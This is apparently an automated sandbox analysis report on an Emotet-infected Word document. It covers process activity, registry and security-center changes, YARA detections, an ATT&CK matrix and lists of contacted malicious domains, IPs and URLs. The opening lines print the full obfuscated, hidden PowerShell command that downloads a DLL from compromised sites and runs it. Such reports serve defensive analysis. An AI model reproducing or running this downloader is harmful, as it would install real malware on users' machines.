EAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAK

Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000000E.00000002.470861626.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_10003D00 cpuid

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_1002A210 GetSystemTimeAsFileTime,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_100012B1 GetVersionExA,CreateWindowExA,ShowWindow,UpdateWindow,

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: svchost.exe, 00000013.00000002.469858560.00000251E1E3D000.00000004.00000001.sdmp	Binary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000013.00000002.469925075.00000251E1F02000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 14.2.rundll32.exe.3410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.3410000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.29e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.29e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.3430000.3.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation111	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer4	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting22	Boot or Logon Initialization Scripts	Process Injection112	Deobfuscate/Decode Files or Information31	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution3	Logon Script (Windows)	Logon Script (Windows)	Scripting22	Security Account Manager	System Information Discovery47	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter21	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Security Software Discovery161	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	PowerShell4	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Virtualization/Sandbox Evasion4	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol15	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading21	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion4	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection112	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Informacion_29.doc	63%	Virustotal		Browse
Informacion_29.doc	79%	ReversingLabs	Document-Office.Trojan.GenScript

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll	64%	Metadefender		Browse
C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll	61%	ReversingLabs	Win32.Trojan.EmotetCrypt

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
13.2.rundll32.exe.41b0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
14.2.rundll32.exe.3430000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
rycomputer.com	12%	Virustotal	Browse
00zyku.com	7%	Virustotal	Browse
wheelcomoving.com	7%	Virustotal	Browse
d-cem.com	11%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6	0%	Avira URL Cloud	safe
https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-includes/wlwmanifest.xml	0%	Avira URL Cloud	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea	0%	Avira URL Cloud	safe
https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg	0%	Avira URL Cloud	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4	0%	Avira URL Cloud	safe
http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5	0%	Avira URL Cloud	safe
https://wheelcomoving.com/services/	0%	Avira URL Cloud	safe
https://wheelcomoving.com/wp-admin/admin-ajax.php	0%	Avira URL Cloud	safe
http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://d-cem.com	0%	Avira URL Cloud	safe
http://00zyku.comx	0%	Avira URL Cloud	safe
https://ketoresetme.com/author/admin/	0%	Avira URL Cloud	safe
https://ketoresetme.com/category/keto-summit/	0%	Avira URL Cloud	safe
https://wheelcomoving.com/wp-content/uploads/2015/09/Cargo-logo-white1.png	0%	Avira URL Cloud	safe
https://ketoresetme.com/xmlrpc.p	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/themes/cargo/js/slick.min.js?ver=5.6	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/themes/cargo/style.css?ver=5.6	0%	Avira URL Cloud	safe
http://ketoresetme.com/wp-content/themes/Newspaper/style.css?ver=8.1	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://ketoresetme.com/category/keto-news/	0%	Avira URL Cloud	safe
http://ketoresetme.com/xmlrpc.php	0%	Avira URL Cloud	safe
http://00zyku.com	0%	Avira URL Cloud	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://ketoresetme.com/wp-content/uploads/2020/09/reclama-lifestyle.jpg	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://rajwap.pro/	0%	Avira URL Cloud	safe
https://wheelcomoving.com/company/contact/	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://ketoresetme.com/contact-us/	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-B	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6	0%	Avira URL Cloud	safe
https://arabysexy.mobi/	0%	Avira URL Cloud	safe
http://ketoresetme.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp	0%	Avira URL Cloud	safe
http://ketoresetme.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl	0%	Avira URL Cloud	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://dirtyindianporn.info/	0%	Avira URL Cloud	safe
https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/themes/cargo/js/header.misc.js?ver=5.6	0%	Avira URL Cloud	safe
https://wheelcomoving.com/services/ocean-cargo/	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/plugins/wpcargo/admin/assets/css/jquery.datetimepicker.min.css?v	0%	Avira URL Cloud	safe
https://ketoresetme.com/privacy-policy-2/	0%	Avira URL Cloud	safe
http://192.168.0.194/wp_011_lifestyle/wp-content/uploads/2017/03/2.jpg	0%	Avira URL Cloud	safe
http://ketoresetme.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.5.1	0%	Avira URL Cloud	safe
https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100	0%	Avira URL Cloud	safe
https://wheelcomoving.com/xmlrpc.php?rsd	0%	Avira URL Cloud	safe
http://ketoresetme.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=	0%	Avira URL Cloud	safe
http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/wpcargo-style.css?ver=6.7.4	0%	Avira URL Cloud	safe
https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/	0%	Avira URL Cloud	safe
http://190.247.139.101/o7vtz/g3p9nxague/	0%	Avira URL Cloud	safe
http://190.247.139.101/o7vtz/g3p9nxague/llc	0%	Avira URL Cloud	safe
https://indianpornmovies.info/	0%	Avira URL Cloud	safe
https://ketoresetme.com/category/keto/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rycomputer.com	58.97.195.135	true	true	12%, Virustotal, Browse	unknown
00zyku.com	193.187.117.26	true	true	7%, Virustotal, Browse	unknown
wheelcomoving.com	66.85.46.76	true	true	7%, Virustotal, Browse	unknown
d-cem.com	35.214.169.246	true	true	11%, Virustotal, Browse	unknown
ketoresetme.com	70.32.23.58	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://shell.suite.office.com:1443	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://ketoresetme.com/wp-content/uploads/2021/01/My-Southern-Keto-Kitchen-Cookbook-HOW-I-GOT-HERE-	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://autodiscover-s.outlook.com/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/jquery.dd.js?ver=5.6	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/#respond	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://wheelcomoving.com/wp-includes/wlwmanifest.xml	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.entity.	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-ea	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://ketoresetme.com/wp-content/uploads/2020/09/11.jpg	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://rpsticket.partnerservices.getmicrosoftkey.com	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://freejavporn.mobi/	powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp	false		high
http://wheelcomoving.com/wp-content/plugins/wpcargo/assets/css/fontawesome.min.css?ver=6.7.4	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5	rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://wheelcomoving.com/services/	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
https://wheelcomoving.com/wp-admin/admin-ajax.php	powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr	false		high
